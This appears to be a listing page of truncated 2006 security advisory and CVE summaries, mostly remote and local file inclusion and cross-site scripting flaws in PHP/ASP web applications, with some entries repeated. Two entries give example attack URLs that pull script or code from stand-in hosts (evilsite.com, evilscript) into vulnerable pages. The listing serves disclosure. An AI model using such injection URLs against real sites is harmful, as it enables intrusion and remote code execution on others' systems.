CMS Faethon 1.3.2 - mainpath Remote File Inclusion

CMS Faethon 1.3.2 - mainpath Remote File Inclusion \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV33$2006 --------------------------------------------------------------------------- ECHOADV33$2006 CMS Faethon 1.3.2 mainpath Remote File Inclusion...

DCP-Portal 6.1.x (root) Remote File Include Vulnerability

No description provided by source. ----------------------------------------------------- Advisory id: FSA:013 Author: Federico Fazzi Date: 12/06/2006, 9:31 Sinthesis: DCP-Portal 6.1.x, Remote command execution Type: high Product: http://www.dcp-portal.org/ Patch: unavailable...

DCP-Portal 6.1.x - 'root' Remote File Inclusion

----------------------------------------------------- Advisory id: FSA:013 Author: Federico Fazzi Date: 12/06/2006, 9:31 Sinthesis: DCP-Portal 6.1.x, Remote command execution Type: high Product: http://www.dcp-portal.org/ Patch: unavailable ----------------------------------------------------- 1...

DCP-Portal 6.1.x (root) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ========================================================= DCP-Portal 6.1.x root Remote File Include Vulnerability ========================================================= ----------------------------------------------------- Advisory id:...

f_ac-1.11.txt

----------------------------------------------------- Advisory id: FSA:011 Author: Federico Fazzi Date: 11/06/2006, 22:30 Sinthesis: AWF CMS 1.11, Remote command execution Type: high Product: http://www.awf-cms.org/ Patch: unavailable ----------------------------------------------------- 1...

DoceboLms303.txt

----------------------------------------------------- Advisory id: FSA:010 Author: Federico Fazzi Date: 09/06/2006, 7:24 Sinthesis: Docebo Lms 3.0.3, Remote command execution Type: high Product: http://www.docebolms.org/ Patch: unavailable ----------------------------------------------------- 1...

cms-bandits2.5.txt

----------------------------------------------------- Advisory id: FSA:006 Author: Federico Fazzi Date: 08/06/2006, 11:09 Sinthesis: cms-bandits 2.5, Remote command execution Type: high Product: http://sourceforge.net/projects/cms-bandits Patch: unavailable...

Chemical Directory - XSS

Chemical Directory v.unknown doesnt say on website Homepage: http://www.scriptsez.net/ Effected files: dictionary.php XSS Vulnerability via keyword variable: http://www.example.com/dictionary.php?action=browse&keyword=eSCRIPT SRC=http://evilsite.com/xss.js/SCRIPT...

Cross site scripting

Cross-site scripting XSS vulnerability in the taxonomy module in Drupal 4.6.8 and 4.7.2 allows remote attackers to inject arbitrary web script or HTML via inputs that are not properly validated when the page title is output, possibly involving the $names variable...

CVE-2006-2833

Cross-site scripting XSS vulnerability in the taxonomy module in Drupal 4.6.8 and 4.7.2 allows remote attackers to inject arbitrary web script or HTML via inputs that are not properly validated when the page title is output, possibly involving the $names variable...

CVE-2006-2833

Cross-site scripting XSS vulnerability in the taxonomy module in Drupal 4.6.8 and 4.7.2 allows remote attackers to inject arbitrary web script or HTML via inputs that are not properly validated when the page title is output, possibly involving the $names variable...

CVE-2006-2828

CVE-2006-2828 is a vulnerability in PHP-Nuke where a global variable overwrite allows remote PHP file inclusion by a modified phpbb_root_path parameter to multiple admin scripts (index.php, admin_ug_auth.php, admin_board.php, admin_disallow.php, admin_forumauth.php, admin_groups.php, admin_ranks....

Squirrelmail local file inclusion

Squirrelmail local file inclusion bug in functions/plugin.php . Tested on the latest 1.4.x version. No authentication needed. if isset$plugins && isarray$plugins foreach $plugins as $name useplugin$name; ... function useplugin $name if fileexistsSMPATH . "plugins/$name/setup.php" includeonceSMPAT...

ASP Discussion Forum Like the one on FreeVBCode.com Remote XSS Exploit

----------------------------------------------------------------------------- - ASP Discussion Forum Like the one on FreeVBCode.com Remote XSS Exploit - -= http://colander.altervista.org/advisory/ASPDisc.txt =- ----------------------------------------------------------------------------- -= ASP...

phpMyDesktop.txt

phpMyDesktop|arcade 1.0 FINAL Code Execution Exploit found-by: darkgod [email protected] links: criticalsecurity.NET, hackthissite.org, hacbloc.org video-@: http://dgod.dajoob.com/videos/phpmydesktoparcade.rar phpMyDesktop|arcade is a php-based 'bridge' between a game and message board. Its g...

OaBoard 1.0 Remote File inclusion

OaBoard version 1.x have remote file inclusion . Variables $inc isn't initialized in the include http://host/oaboard/forum.php?inc=http://evilscript/ Hessam-x www.hessamx.net...

phpMyDesktop|arcade 1.0 FINAL Code Execution

phpMyDesktop|arcade 1.0 FINAL Code Execution Exploit found-by: darkgod [email protected] links: criticalsecurity.NET, hackthissite.org, hacbloc.org video-@: http://dgod.dajoob.com/videos/phpmydesktoparcade.rar phpMyDesktop|arcade is a php-based 'bridge' between a game and message board. Its g...

DSA-1075-1 awstats - programming error

Bulletin has no description...

APC ActionApps CMS 2.8.1 - Remote File Inclusion

APC ActionApps CMS 2.8.1 - Remote File Inclusion DEVIL TEAM THE BEST POLISH TEAM APC ActionApps CMS 2.8.1 - Remote File Include Vulnerabilities Find by Kacper Rahim. Greetings For ALL DEVIL TEAM members, Special DragonHeart : Contact: [email protected] or http://www.devilteam.yum.pl site:...

CVE-2006-2547

Unspecified vulnerability in the sapdba command in SAP with Informix before 700, and 700 up to patch 100, allows local users to execute arbitrary commands via unknown vectors related to "insecure environment variable" handling...